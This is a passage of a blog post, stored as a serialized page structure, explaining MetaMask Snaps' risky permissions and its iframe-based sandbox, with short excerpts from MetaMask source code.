snap:",{"type":24,"tag":32,"props":42237,"children":42238},{},[42239],{"type":24,"tag":177,"props":42240,"children":42242},{"alt":7,"src":42241},"/posts/metamask-snaps/permissions.png",[],{"type":24,"tag":2655,"props":42244,"children":42245},{},[42246,42264],{"type":24,"tag":2659,"props":42247,"children":42248},{},[42249,42255,42256,42262],{"type":24,"tag":145,"props":42250,"children":42252},{"className":42251},[],[42253],{"type":30,"value":42254},"snap_getBip44Entropy",{"type":30,"value":2378},{"type":24,"tag":145,"props":42257,"children":42259},{"className":42258},[],[42260],{"type":30,"value":42261},"snap_getBip32Entropy",{"type":30,"value":42263}," -> a malicious snap retrieving keypair leads to loss of funds",{"type":24,"tag":2659,"props":42265,"children":42266},{},[42267,42273],{"type":24,"tag":145,"props":42268,"children":42270},{"className":42269},[],[42271],{"type":30,"value":42272},"endowment:transaction-insight",{"type":30,"value":42274}," -> a malicious snap getting insights of a transaction before approval can lead to frontrunning attacks",{"type":24,"tag":80,"props":42276,"children":42278},{"id":42277},"snap-execution-environment",[42279],{"type":30,"value":42280},"Snap execution environment",{"type":24,"tag":32,"props":42282,"children":42283},{},[42284],{"type":30,"value":42285},"Snaps are executed in a totally sandboxed environment which provides a safe context for executing untrusted code, and separates it from the normal execution flow. To accomplish this, Metamask uses 3 layers of security to create this safe environment:",{"type":24,"tag":6246,"props":42287,"children":42288},{},[42289,42294,42299],{"type":24,"tag":2659,"props":42290,"children":42291},{},[42292],{"type":30,"value":42293},"An isolated iframe",{"type":24,"tag":2659,"props":42295,"children":42296},{},[42297],{"type":30,"value":42298},"LavaMoat",{"type":24,"tag":2659,"props":42300,"children":42301},{},[42302],{"type":30,"value":42303},"SES (Secure EcmaScript)",{"type":24,"tag":32,"props":42305,"children":42306},{},[42307],{"type":24,"tag":177,"props":42308,"children":42310},{"alt":7,"src":42309},"/posts/metamask-snaps/environment.png",[],{"type":24,"tag":80,"props":42312,"children":42314},{"id":42313},"isolated-iframe-layer-1",[42315],{"type":30,"value":42316},"Isolated Iframe - Layer 1",{"type":24,"tag":32,"props":42318,"children":42319},{},[42320,42322,42329],{"type":30,"value":42321},"Snaps empower developers to enhance Metamask's functionality while maintaining a strong security posture. These modules execute within an ",{"type":24,"tag":188,"props":42323,"children":42326},{"href":42324,"rel":42325},"https://blog.logrocket.com/the-ultimate-guide-to-iframes/",[192],[42327],{"type":30,"value":42328},"Iframe",{"type":30,"value":42330}," environment, ensuring they are isolated and secure. To facilitate this execution, Metamask takes advantage of an iFrame sandboxing mechanism, allowing snaps to operate in a contained context.",{"type":24,"tag":270,"props":42332,"children":42334},{"id":42333},"the-framework-metamask-extension-repo",[42335],{"type":30,"value":42336},"The Framework: Metamask-Extension Repo",{"type":24,"tag":32,"props":42338,"children":42339},{},[42340,42342,42348,42350,42356],{"type":30,"value":42341},"The process of snap execution kicks off within the metamask-extension repository's ",{"type":24,"tag":145,"props":42343,"children":42345},{"className":42344},[],[42346],{"type":30,"value":42347},"metamask-controller.js",{"type":30,"value":42349}," file. Here's a glimpse of the relevant ",{"type":24,"tag":188,"props":42351,"children":42354},{"href":42352,"rel":42353},"https://github.com/MetaMask/metamask-extension/blob/4b23ea8c95bea9ea12336537bb6bda4568a99098/app/scripts/metamask-controller.js#L978",[192],[42355],{"type":30,"value":145},{"type":30,"value":1679},{"type":24,"tag":291,"props":42358,"children":42360},{"className":3185,"code":42359,"language":3184,"meta":7,"style":7},"// Import snaps-controllers\n// ...\nconst snapExecutionServiceArgs = {\n iframeUrl: new URL(process.env.IFRAME_EXECUTION_ENVIRONMENT_URL),\n messenger: this.controllerMessenger.getRestricted({\n name: 'ExecutionService',\n }),\n setupSnapProvider: this.setupSnapProvider.bind(this),\n};\n\n// Define IFRAME_EXECUTION_ENVIRONMENT_URL\nprocess.env.IFRAME_EXECUTION_ENVIRONMENT_URL =\n 'https://execution.metamask.io/0.36.1-flask.1/index.html';\n// ...\n",[42361],{"type":24,"tag":145,"props":42362,"children":42363},{"__ignoreMap":7},[42364,42372,42380,42400,42448,42483,42500,42508,42550,42557,42564,42572,42600,42612],{"type":24,"tag":301,"props":42365,"children":42366},{"class":303,"line":304},[42367],{"type":24,"tag":301,"props":42368,"children":42369},{"style":1062},[42370],{"type":30,"value":42371},"// Import snaps-controllers\n",{"type":24,"tag":301,"props":42373,"children":42374},{"class":303,"line":320},[42375],{"type":24,"tag":301,"props":42376,"children":42377},{"style":1062},[42378],{"type":30,"value":42379},"// ...\n",{"type":24,"tag":301,"props":42381,"children":42382},{"class":303,"line":335},[42383,42387,42392,42396],{"type":24,"tag":301,"props":42384,"children":42385},{"style":348},[42386],{"type":30,"value":16460},{"type":24,"tag":301,"props":42388,"children":42389},{"style":369},[42390],{"type":30,"value":42391}," snapExecutionServiceArgs",{"type":24,"tag":301,"props":42393,"children":42394},{"style":385},[42395],{"type":30,"value":2537},{"type":24,"tag":301,"props":42397,"children":42398},{"style":359},[42399],{"type":30,"value":3035},{"type":24,"tag":301,"props":42401,"children":42402},{"class":303,"line":344},[42403,42408,42412,42417,42421,42426,42430,42435,42439,42444],{"type":24,"tag":301,"props":42404,"children":42405},{"style":369},[42406],{"type":30,"value":42407}," iframeUrl:",{"type":24,"tag":301,"props":42409,"children":42410},{"style":348},[42411],{"type":30,"value":38685},{"type":24,"tag":301,"props":42413,"children":42414},{"style":314},[42415],{"type":30,"value":42416}," URL",{"type":24,"tag":301,"props":42418,"children":42419},{"style":359},[42420],{"type":30,"value":362},{"type":24,"tag":301,"props":42422,"children":42423},{"style":369},[42424],{"type":30,"value":42425},"process",{"type":24,"tag":301,"props":42427,"children":42428},{"style":359},[42429],{"type":30,"value":206},{"type":24,"tag":301,"props":42431,"children":42432},{"style":369},[42433],{"type":30,"value":42434},"env",{"type":24,"tag":301,"props":42436,"children":42437},{"style":359},[42438],{"type":30,"value":206},{"type":24,"tag":301,"props":42440,"children":42441},{"style":369},[42442],{"type":30,"value":42443},"IFRAME_EXECUTION_ENVIRONMENT_URL",{"type":24,"tag":301,"props":42445,"children":42446},{"style":359},[42447],{"type":30,"value":4656},{"type":24,"tag":301,"props":42449,"children":42450},{"class":303,"line":401},[42451,42456,42461,42465,42470,42474,42479],{"type":24,"tag":301,"props":42452,"children":42453},{"style":369},[42454],{"type":30,"value":42455}," messenger:",{"type":24,"tag":301,"props":42457,"children":42458},{"style":348},[42459],{"type":30,"value":42460}," this",{"type":24,"tag":301,"props":42462,"children":42463},{"style":359},[42464],{"type":30,"value":206},{"type":24,"tag":301,"props":42466,"children":42467},{"style":369},[42468],{"type":30,"value":42469},"controllerMessenger",{"type":24,"tag":301,"props":42471,"children":42472},{"style":359},[42473],{"type":30,"value":206},{"type":24,"tag":301,"props":42475,"children":42476},{"style":314},[42477],{"type":30,"value":42478},"getRestricted",{"type":24,"tag":301,"props":42480,"children":42481},{"style":359},[42482],{"type":30,"value":4304},{"type":24,"tag":301,"props":42484,"children":42485},{"class":303,"line":415},[42486,42491,42496],{"type":24,"tag":301,"props":42487,"children":42488},{"style":369},[42489],{"type":30,"value":42490}," name:",{"type":24,"tag":301,"props":42492,"children":42493},{"style":329},[42494],{"type":30,"value":42495}," 'ExecutionService'",{"type":24,"tag":301,"props":42497,"children":42498},{"style":359},[42499],{"type":30,"value":1729},{"type":24,"tag":301,"props":42501,"children":42502},{"class":303,"line":439},[42503],{"type":24,"tag":301,"props":42504,"children":42505},{"style":359},[42506],{"type":30,"value":42507}," }),\n",{"type":24,"tag":301,"props":42509,"children":42510},{"class":303,"line":447},[42511,42516,42520,42524,42529,42533,42538,42542,42546],{"type":24,"tag":301,"props":42512,"children":42513},{"style":369},[42514],{"type":30,"value":42515}," setupSnapProvider:",{"type":24,"tag":301,"props":42517,"children":42518},{"style":348},[42519],{"type":30,"value":42460},{"type":24,"tag":301,"props":42521,"children":42522},{"style":359},[42523],{"type":30,"value":206},{"type":24,"tag":301,"props":42525,"children":42526},{"style":369},[42527],{"type":30,"value":42528},"setupSnapProvider",{"type":24,"tag":301,"props":42530,"children":42531},{"style":359},[42532],{"type":30,"value":206},{"type":24,"tag":301,"props":42534,"children":42535},{"style":314},[42536],{"type":30,"value":42537},"bind",{"type":24,"tag":301,"props":42539,"children":42540},{"style":359},[42541],{"type":30,"value":362},{"type":24,"tag":301,"props":42543,"children":42544},{"style":348},[42545],{"type":30,"value":8801},{"type":24,"tag":301,"props":42547,"children":42548},{"style":359},[42549],{"type":30,"value":4656},{"type":24,"tag":301,"props":42551,"children":42552},{"class":303,"line":476},[42553],{"type":24,"tag":301,"props":42554,"children":42555},{"style":359},[42556],{"type":30,"value":3118},{"type":24,"tag":301,"props":42558,"children":42559},{"class":303,"line":495},[42560],{"type":24,"tag":301,"props":42561,"children":42562},{"emptyLinePlaceholder":16},[42563],{"type":30,"value":341},{"type":24,"tag":301,"props":42565,"children":42566},{"class":303,"line":504},[42567],{"type":24,"tag":301,"props":42568,"children":42569},{"style":1062},[42570],{"type":30,"value":42571},"// Define IFRAME_EXECUTION_ENVIRONMENT_URL\n",{"type":24,"tag":301,"props":42573,"children":42574},{"class":303,"line":512},[42575,42579,42583,42587,42591,42595],{"type":24,"tag":301,"props":42576,"children":42577},{"style":369},[42578],{"type":30,"value":42425},{"type":24,"tag":301,"props":42580,"children":42581},{"style":359},[42582],{"type":30,"value":206},{"type":24,"tag":301,"props":42584,"children":42585},{"style":369},[42586],{"type":30,"value":42434},{"type":24,"tag":301,"props":42588,"children":42589},{"style":359},[42590],{"type":30,"value":206},{"type":24,"tag":301,"props":42592,"children":42593},{"style":369},[42594],{"type":30,"value":42443},{"type":24,"tag":301,"props":42596,"children":42597},{"style":385},[42598],{"type":30,"value":42599}," =\n",{"type":24,"tag":301,"props":42601,"children":42602},{"class":303,"line":592},[42603,42608],{"type":24,"tag":301,"props":42604,"children":42605},{"style":329},[42606],{"type":30,"value":42607}," 'https://execution.metamask.io/0.36.1-flask.1/index.html'",{"type":24,"tag":301,"props":42609,"children":42610},{"style":359},[42611],{"type":30,"value":492},{"type":24,"tag":301,"props":42613,"children":42614},{"class":303,"line":619},[42615],{"type":24,"tag":301,"props":42616,"children":42617},{"style":1062},[42618],{"type":30,"value":42379},{"type":24,"tag":32,"props":42620,"children":42621},{},[42622,42624,42630,42632,42638,42640,42645],{"type":30,"value":42623},"This code is defining the ",{"type":24,"tag":145,"props":42625,"children":42627},{"className":42626},[],[42628],{"type":30,"value":42629},"snapExecutionServiceArgs",{"type":30,"value":42631}," object, which contains information required for the ",{"type":24,"tag":145,"props":42633,"children":42635},{"className":42634},[],[42636],{"type":30,"value":42637},"IframeExecutionService",{"type":30,"value":42639}," to execute snaps. The ",{"type":24,"tag":145,"props":42641,"children":42643},{"className":42642},[],[42644],{"type":30,"value":42443},{"type":30,"value":42646}," points to the location where the execution environment resides.",{"type":24,"tag":270,"props":42648,"children":42650},{"id":42649},"executing-snaps-iframeexecutionservice-in-action",[42651],{"type":30,"value":42652},"Executing Snaps: IframeExecutionService in Action",{"type":24,"tag":32,"props":42654,"children":42655},{},[42656,42658,42663,42665,42671],{"type":30,"value":42657},"Inside the snaps-controller package's IframeExecutionService.ts file, the ",{"type":24,"tag":145,"props":42659,"children":42661},{"className":42660},[],[42662],{"type":30,"value":42637},{"type":30,"value":42664}," orchestrates snap execution. Again, here's a snippet of the relevant ",{"type":24,"tag":188,"props":42666,"children":42669},{"href":42667,"rel":42668},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-controllers/src/services/AbstractExecutionService.ts#L89",[192],[42670],{"type":30,"value":145},{"type":30,"value":1679},{"type":24,"tag":291,"props":42673,"children":42677},{"className":42674,"code":42675,"language":42676,"meta":7,"style":7},"language-typescript shiki shiki-themes slack-dark","// Register message handlers for snap interactions\nthis.#messenger.registerActionHandler(\n `${controllerName}:handleRpcRequest`,\n async (snapId: string, options: SnapRpcHookArgs) =>\n this.handleRpcRequest(snapId, options),\n);\n\n// More handlers for executeSnap, terminateSnap, etc.\n// ...\n\n// Execute a snap\nasync executeSnap(snapData: SnapExecutionData) {\n // Initialize job, streams, and environment\n const { jobId } = await this.initJob(snapData);\n const { worker, stream } = await this.initEnvStream(jobId);\n // ...\n}\n","typescript",[42678],{"type":24,"tag":145,"props":42679,"children":42680},{"__ignoreMap":7},[42681,42689,42718,42748,42801,42838,42845,42852,42860,42867,42874,42882,42916,42924,42979,43041,43049],{"type":24,"tag":301,"props":42682,"children":42683},{"class":303,"line":304},[42684],{"type":24,"tag":301,"props":42685,"children":42686},{"style":1062},[42687],{"type":30,"value":42688},"// Register message handlers for snap interactions\n",{"type":24,"tag":301,"props":42690,"children":42691},{"class":303,"line":320},[42692,42696,42700,42705,42709,42714],{"type":24,"tag":301,"props":42693,"children":42694},{"style":348},[42695],{"type":30,"value":8801},{"type":24,"tag":301,"props":42697,"children":42698},{"style":359},[42699],{"type":30,"value":206},{"type":24,"tag":301,"props":42701,"children":42702},{"style":369},[42703],{"type":30,"value":42704},"#messenger",{"type":24,"tag":301,"props":42706,"children":42707},{"style":359},[42708],{"type":30,"value":206},{"type":24,"tag":301,"props":42710,"children":42711},{"style":314},[42712],{"type":30,"value":42713},"registerActionHandler",{"type":24,"tag":301,"props":42715,"children":42716},{"style":359},[42717],{"type":30,"value":1707},{"type":24,"tag":301,"props":42719,"children":42720},{"class":303,"line":335},[42721,42726,42730,42735,42739,42744],{"type":24,"tag":301,"props":42722,"children":42723},{"style":329},[42724],{"type":30,"value":42725}," `",{"type":24,"tag":301,"props":42727,"children":42728},{"style":348},[42729],{"type":30,"value":40857},{"type":24,"tag":301,"props":42731,"children":42732},{"style":369},[42733],{"type":30,"value":42734},"controllerName",{"type":24,"tag":301,"props":42736,"children":42737},{"style":348},[42738],{"type":30,"value":40889},{"type":24,"tag":301,"props":42740,"children":42741},{"style":329},[42742],{"type":30,"value":42743},":handleRpcRequest`",{"type":24,"tag":301,"props":42745,"children":42746},{"style":359},[42747],{"type":30,"value":1729},{"type":24,"tag":301,"props":42749,"children":42750},{"class":303,"line":344},[42751,42756,42760,42765,42769,42774,42778,42783,42787,42792,42796],{"type":24,"tag":301,"props":42752,"children":42753},{"style":348},[42754],{"type":30,"value":42755}," async",{"type":24,"tag":301,"props":42757,"children":42758},{"style":359},[42759],{"type":30,"value":873},{"type":24,"tag":301,"props":42761,"children":42762},{"style":369},[42763],{"type":30,"value":42764},"snapId",{"type":24,"tag":301,"props":42766,"children":42767},{"style":385},[42768],{"type":30,"value":1679},{"type":24,"tag":301,"props":42770,"children":42771},{"style":10246},[42772],{"type":30,"value":42773}," string",{"type":24,"tag":301,"props":42775,"children":42776},{"style":359},[42777],{"type":30,"value":377},{"type":24,"tag":301,"props":42779,"children":42780},{"style":369},[42781],{"type":30,"value":42782},"options",{"type":24,"tag":301,"props":42784,"children":42785},{"style":385},[42786],{"type":30,"value":1679},{"type":24,"tag":301,"props":42788,"children":42789},{"style":10246},[42790],{"type":30,"value":42791}," SnapRpcHookArgs",{"type":24,"tag":301,"props":42793,"children":42794},{"style":359},[42795],{"type":30,"value":911},{"type":24,"tag":301,"props":42797,"children":42798},{"style":348},[42799],{"type":30,"value":42800},"=>\n",{"type":24,"tag":301,"props":42802,"children":42803},{"class":303,"line":401},[42804,42809,42813,42818,42822,42826,42830,42834],{"type":24,"tag":301,"props":42805,"children":42806},{"style":348},[42807],{"type":30,"value":42808}," this",{"type":24,"tag":301,"props":42810,"children":42811},{"style":359},[42812],{"type":30,"value":206},{"type":24,"tag":301,"props":42814,"children":42815},{"style":314},[42816],{"type":30,"value":42817},"handleRpcRequest",{"type":24,"tag":301,"props":42819,"children":42820},{"style":359},[42821],{"type":30,"value":362},{"type":24,"tag":301,"props":42823,"children":42824},{"style":369},[42825],{"type":30,"value":42764},{"type":24,"tag":301,"props":42827,"children":42828},{"style":359},[42829],{"type":30,"value":377},{"type":24,"tag":301,"props":42831,"children":42832},{"style":369},[42833],{"type":30,"value":42782},{"type":24,"tag":301,"props":42835,"children":42836},{"style":359},[42837],{"type":30,"value":4656},{"type":24,"tag":301,"props":42839,"children":42840},{"class":303,"line":415},[42841],{"type":24,"tag":301,"props":42842,"children":42843},{"style":359},[42844],{"type":30,"value":589},{"type":24,"tag":301,"props":42846,"children":42847},{"class":303,"line":439},[42848],{"type":24,"tag":301,"props":42849,"children":42850},{"emptyLinePlaceholder":16},[42851],{"type":30,"value":341},{"type":24,"tag":301,"props":42853,"children":42854},{"class":303,"line":447},[42855],{"type":24,"tag":301,"props":42856,"children":42857},{"style":1062},[42858],{"type":30,"value":42859},"// More handlers for executeSnap, terminateSnap, etc.\n",{"type":24,"tag":301,"props":42861,"children":42862},{"class":303,"line":476},[42863],{"type":24,"tag":301,"props":42864,"children":42865},{"style":1062},[42866],{"type":30,"value":42379},{"type":24,"tag":301,"props":42868,"children":42869},{"class":303,"line":495},[42870],{"type":24,"tag":301,"props":42871,"children":42872},{"emptyLinePlaceholder":16},[42873],{"type":30,"value":341},{"type":24,"tag":301,"props":42875,"children":42876},{"class":303,"line":504},[42877],{"type":24,"tag":301,"props":42878,"children":42879},{"style":1062},[42880],{"type":30,"value":42881},"// Execute a snap\n",{"type":24,"tag":301,"props":42883,"children":42884},{"class":303,"line":512},[42885,42889,42894,42898,42903,42907,42912],{"type":24,"tag":301,"props":42886,"children":42887},{"style":369},[42888],{"type":30,"value":4919},{"type":24,"tag":301,"props":42890,"children":42891},{"style":314},[42892],{"type":30,"value":42893}," executeSnap",{"type":24,"tag":301,"props":42895,"children":42896},{"style":359},[42897],{"type":30,"value":362},{"type":24,"tag":301,"props":42899,"children":42900},{"style":369},[42901],{"type":30,"value":42902},"snapData",{"type":24,"tag":301,"props":42904,"children":42905},{"style":359},[42906],{"type":30,"value":5615},{"type":24,"tag":301,"props":42908,"children":42909},{"style":369},[42910],{"type":30,"value":42911},"SnapExecutionData",{"type":24,"tag":301,"props":42913,"children":42914},{"style":359},[42915],{"type":30,"value":398},{"type":24,"tag":301,"props":42917,"children":42918},{"class":303,"line":592},[42919],{"type":24,"tag":301,"props":42920,"children":42921},{"style":1062},[42922],{"type":30,"value":42923}," // Initialize job, streams, and environment\n",{"type":24,"tag":301,"props":42925,"children":42926},{"class":303,"line":619},[42927,42932,42936,42941,42946,42950,42954,42958,42962,42967,42971,42975],{"type":24,"tag":301,"props":42928,"children":42929},{"style":348},[42930],{"type":30,"value":42931}," const",{"type":24,"tag":301,"props":42933,"children":42934},{"style":359},[42935],{"type":30,"value":16392},{"type":24,"tag":301,"props":42937,"children":42938},{"style":369},[42939],{"type":30,"value":42940},"jobId",{"type":24,"tag":301,"props":42942,"children":42943},{"style":359},[42944],{"type":30,"value":42945}," } ",{"type":24,"tag":301,"props":42947,"children":42948},{"style":385},[42949],{"type":30,"value":523},{"type":24,"tag":301,"props":42951,"children":42952},{"style":308},[42953],{"type":30,"value":4617},{"type":24,"tag":301,"props":42955,"children":42956},{"style":348},[42957],{"type":30,"value":42460},{"type":24,"tag":301,"props":42959,"children":42960},{"style":359},[42961],{"type":30,"value":206},{"type":24,"tag":301,"props":42963,"children":42964},{"style":314},[42965],{"type":30,"value":42966},"initJob",{"type":24,"tag":301,"props":42968,"children":42969},{"style":359},[42970],{"type":30,"value":362},{"type":24,"tag":301,"props":42972,"children":42973},{"style":369},[42974],{"type":30,"value":42902},{"type":24,"tag":301,"props":42976,"children":42977},{"style":359},[42978],{"type":30,"value":589},{"type":24,"tag":301,"props":42980,"children":42981},{"class":303,"line":635},[42982,42986,42990,42995,42999,43004,43008,43012,43016,43020,43024,43029,43033,43037],{"type":24,"tag":301,"props":42983,"children":42984},{"style":348},[42985],{"type":30,"value":42931},{"type":24,"tag":301,"props":42987,"children":42988},{"style":359},[42989],{"type":30,"value":16392},{"type":24,"tag":301,"props":42991,"children":42992},{"style":369},[42993],{"type":30,"value":42994},"worker",{"type":24,"tag":301,"props":42996,"children":42997},{"style":359},[42998],{"type":30,"value":377},{"type":24,"tag":301,"props":43000,"children":43001},{"style":369},[43002],{"type":30,"value":43003},"stream",{"type":24,"tag":301,"props":43005,"children":43006},{"style":359},[43007],{"type":30,"value":42945},{"type":24,"tag":301,"props":43009,"children":43010},{"style":385},[43011],{"type":30,"value":523},{"type":24,"tag":301,"props":43013,"children":43014},{"style":308},[43015],{"type":30,"value":4617},{"type":24,"tag":301,"props":43017,"children":43018},{"style":348},[43019],{"type":30,"value":42460},{"type":24,"tag":301,"props":43021,"children":43022},{"style":359},[43023],{"type":30,"value":206},{"type":24,"tag":301,"props":43025,"children":43026},{"style":314},[43027],{"type":30,"value":43028},"initEnvStream",{"type":24,"tag":301,"props":43030,"children":43031},{"style":359},[43032],{"type":30,"value":362},{"type":24,"tag":301,"props":43034,"children":43035},{"style":369},[43036],{"type":30,"value":42940},{"type":24,"tag":301,"props":43038,"children":43039},{"style":359},[43040],{"type":30,"value":589},{"type":24,"tag":301,"props":43042,"children":43043},{"class":303,"line":643},[43044],{"type":24,"tag":301,"props":43045,"children":43046},{"style":1062},[43047],{"type":30,"value":43048}," // ...\n",{"type":24,"tag":301,"props":43050,"children":43051},{"class":303,"line":652},[43052],{"type":24,"tag":301,"props":43053,"children":43054},{"style":359},[43055],{"type":30,"value":698},{"type":24,"tag":32,"props":43057,"children":43058},{},[43059,43060,43065,43067,43073],{"type":30,"value":8079},{"type":24,"tag":145,"props":43061,"children":43063},{"className":43062},[],[43064],{"type":30,"value":42637},{"type":30,"value":43066}," registers message handlers that facilitate communication between Metamask and snaps within the iFrame. The ",{"type":24,"tag":145,"props":43068,"children":43070},{"className":43069},[],[43071],{"type":30,"value":43072},"${controllerName}:executeSnap",{"type":30,"value":43074}," handler triggers the snap execution process.",{"type":24,"tag":270,"props":43076,"children":43078},{"id":43077},"step-by-step-execution-from-initialization-to-iframe-creation",[43079,43081],{"type":30,"value":43080},"Step-by-Step Execution: From Initialization to iFrame ",{"type":24,"tag":188,"props":43082,"children":43085},{"href":43083,"rel":43084},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-controllers/src/services/iframe/IframeExecutionService.ts#L31",[192],[43086],{"type":30,"value":43087},"creation",{"type":24,"tag":291,"props":43089,"children":43091},{"className":42674,"code":43090,"language":42676,"meta":7,"style":7},"protected async initEnvStream(jobId: string): Promise\u003C{\n worker: Window;\n stream: BasePostMessageStream;\n }> {\n const iframeWindow = await createWindow(this.iframeUrl.toString(), jobId);\n\n const stream = new WindowPostMessageStream({\n name: 'parent',\n target: 'child',\n targetWindow: iframeWindow,\n targetOrigin: '*',\n });\n\n return { worker: iframeWindow, stream };\n }\n",[43092],{"type":24,"tag":145,"props":43093,"children":43094},{"__ignoreMap":7},[43095,43144,43165,43186,43194,43258,43265,43293,43310,43327,43344,43361,43368,43375,43399],{"type":24,"tag":301,"props":43096,"children":43097},{"class":303,"line":304},[43098,43103,43108,43113,43117,43121,43125,43129,43134,43139],{"type":24,"tag":301,"props":43099,"children":43100},{"style":369},[43101],{"type":30,"value":43102},"protected",{"type":24,"tag":301,"props":43104,"children":43105},{"style":369},[43106],{"type":30,"value":43107}," async",{"type":24,"tag":301,"props":43109,"children":43110},{"style":314},[43111],{"type":30,"value":43112}," initEnvStream",{"type":24,"tag":301,"props":43114,"children":43115},{"style":359},[43116],{"type":30,"value":362},{"type":24,"tag":301,"props":43118,"children":43119},{"style":369},[43120],{"type":30,"value":42940},{"type":24,"tag":301,"props":43122,"children":43123},{"style":359},[43124],{"type":30,"value":5615},{"type":24,"tag":301,"props":43126,"children":43127},{"style":369},[43128],{"type":30,"value":36423},{"type":24,"tag":301,"props":43130,"children":43131},{"style":359},[43132],{"type":30,"value":43133},"): ",{"type":24,"tag":301,"props":43135,"children":43136},{"style":10246},[43137],{"type":30,"value":43138},"Promise",{"type":24,"tag":301,"props":43140,"children":43141},{"style":359},[43142],{"type":30,"value":43143},"\u003C{\n",{"type":24,"tag":301,"props":43145,"children":43146},{"class":303,"line":320},[43147,43152,43156,43161],{"type":24,"tag":301,"props":43148,"children":43149},{"style":369},[43150],{"type":30,"value":43151}," worker",{"type":24,"tag":301,"props":43153,"children":43154},{"style":385},[43155],{"type":30,"value":1679},{"type":24,"tag":301,"props":43157,"children":43158},{"style":10246},[43159],{"type":30,"value":43160}," Window",{"type":24,"tag":301,"props":43162,"children":43163},{"style":359},[43164],{"type":30,"value":492},{"type":24,"tag":301,"props":43166,"children":43167},{"class":303,"line":335},[43168,43173,43177,43182],{"type":24,"tag":301,"props":43169,"children":43170},{"style":369},[43171],{"type":30,"value":43172}," stream",{"type":24,"tag":301,"props":43174,"children":43175},{"style":385},[43176],{"type":30,"value":1679},{"type":24,"tag":301,"props":43178,"children":43179},{"style":10246},[43180],{"type":30,"value":43181}," BasePostMessageStream",{"type":24,"tag":301,"props":43183,"children":43184},{"style":359},[43185],{"type":30,"value":492},{"type":24,"tag":301,"props":43187,"children":43188},{"class":303,"line":344},[43189],{"type":24,"tag":301,"props":43190,"children":43191},{"style":359},[43192],{"type":30,"value":43193}," }> {\n",{"type":24,"tag":301,"props":43195,"children":43196},{"class":303,"line":401},[43197,43202,43207,43211,43215,43220,43224,43228,43232,43237,43241,43246,43250,43254],{"type":24,"tag":301,"props":43198,"children":43199},{"style":359},[43200],{"type":30,"value":43201}," const ",{"type":24,"tag":301,"props":43203,"children":43204},{"style":369},[43205],{"type":30,"value":43206},"iframeWindow",{"type":24,"tag":301,"props":43208,"children":43209},{"style":385},[43210],{"type":30,"value":2537},{"type":24,"tag":301,"props":43212,"children":43213},{"style":308},[43214],{"type":30,"value":4617},{"type":24,"tag":301,"props":43216,"children":43217},{"style":314},[43218],{"type":30,"value":43219}," createWindow",{"type":24,"tag":301,"props":43221,"children":43222},{"style":359},[43223],{"type":30,"value":362},{"type":24,"tag":301,"props":43225,"children":43226},{"style":348},[43227],{"type":30,"value":8801},{"type":24,"tag":301,"props":43229,"children":43230},{"style":359},[43231],{"type":30,"value":206},{"type":24,"tag":301,"props":43233,"children":43234},{"style":369},[43235],{"type":30,"value":43236},"iframeUrl",{"type":24,"tag":301,"props":43238,"children":43239},{"style":359},[43240],{"type":30,"value":206},{"type":24,"tag":301,"props":43242,"children":43243},{"style":314},[43244],{"type":30,"value":43245},"toString",{"type":24,"tag":301,"props":43247,"children":43248},{"style":359},[43249],{"type":30,"value":25153},{"type":24,"tag":301,"props":43251,"children":43252},{"style":369},[43253],{"type":30,"value":42940},{"type":24,"tag":301,"props":43255,"children":43256},{"style":359},[43257],{"type":30,"value":589},{"type":24,"tag":301,"props":43259,"children":43260},{"class":303,"line":415},[43261],{"type":24,"tag":301,"props":43262,"children":43263},{"emptyLinePlaceholder":16},[43264],{"type":30,"value":341},{"type":24,"tag":301,"props":43266,"children":43267},{"class":303,"line":439},[43268,43272,43276,43280,43284,43289],{"type":24,"tag":301,"props":43269,"children":43270},{"style":359},[43271],{"type":30,"value":43201},{"type":24,"tag":301,"props":43273,"children":43274},{"style":369},[43275],{"type":30,"value":43003},{"type":24,"tag":301,"props":43277,"children":43278},{"style":385},[43279],{"type":30,"value":2537},{"type":24,"tag":301,"props":43281,"children":43282},{"style":348},[43283],{"type":30,"value":38685},{"type":24,"tag":301,"props":43285,"children":43286},{"style":314},[43287],{"type":30,"value":43288}," WindowPostMessageStream",{"type":24,"tag":301,"props":43290,"children":43291},{"style":359},[43292],{"type":30,"value":4304},{"type":24,"tag":301,"props":43294,"children":43295},{"class":303,"line":447},[43296,43301,43306],{"type":24,"tag":301,"props":43297,"children":43298},{"style":369},[43299],{"type":30,"value":43300}," name:",{"type":24,"tag":301,"props":43302,"children":43303},{"style":329},[43304],{"type":30,"value":43305}," 'parent'",{"type":24,"tag":301,"props":43307,"children":43308},{"style":359},[43309],{"type":30,"value":1729},{"type":24,"tag":301,"props":43311,"children":43312},{"class":303,"line":476},[43313,43318,43323],{"type":24,"tag":301,"props":43314,"children":43315},{"style":369},[43316],{"type":30,"value":43317}," target:",{"type":24,"tag":301,"props":43319,"children":43320},{"style":329},[43321],{"type":30,"value":43322}," 'child'",{"type":24,"tag":301,"props":43324,"children":43325},{"style":359},[43326],{"type":30,"value":1729},{"type":24,"tag":301,"props":43328,"children":43329},{"class":303,"line":495},[43330,43335,43340],{"type":24,"tag":301,"props":43331,"children":43332},{"style":369},[43333],{"type":30,"value":43334}," targetWindow:",{"type":24,"tag":301,"props":43336,"children":43337},{"style":369},[43338],{"type":30,"value":43339}," iframeWindow",{"type":24,"tag":301,"props":43341,"children":43342},{"style":359},[43343],{"type":30,"value":1729},{"type":24,"tag":301,"props":43345,"children":43346},{"class":303,"line":504},[43347,43352,43357],{"type":24,"tag":301,"props":43348,"children":43349},{"style":369},[43350],{"type":30,"value":43351}," targetOrigin:",{"type":24,"tag":301,"props":43353,"children":43354},{"style":329},[43355],{"type":30,"value":43356}," '*'",{"type":24,"tag":301,"props":43358,"children":43359},{"style":359},[43360],{"type":30,"value":1729},{"type":24,"tag":301,"props":43362,"children":43363},{"class":303,"line":512},[43364],{"type":24,"tag":301,"props":43365,"children":43366},{"style":359},[43367],{"type":30,"value":39009},{"type":24,"tag":301,"props":43369,"children":43370},{"class":303,"line":592},[43371],{"type":24,"tag":301,"props":43372,"children":43373},{"emptyLinePlaceholder":16},[43374],{"type":30,"value":341},{"type":24,"tag":301,"props":43376,"children":43377},{"class":303,"line":619},[43378,43383,43387,43391,43395],{"type":24,"tag":301,"props":43379,"children":43380},{"style":359},[43381],{"type":30,"value":43382}," return { worker: 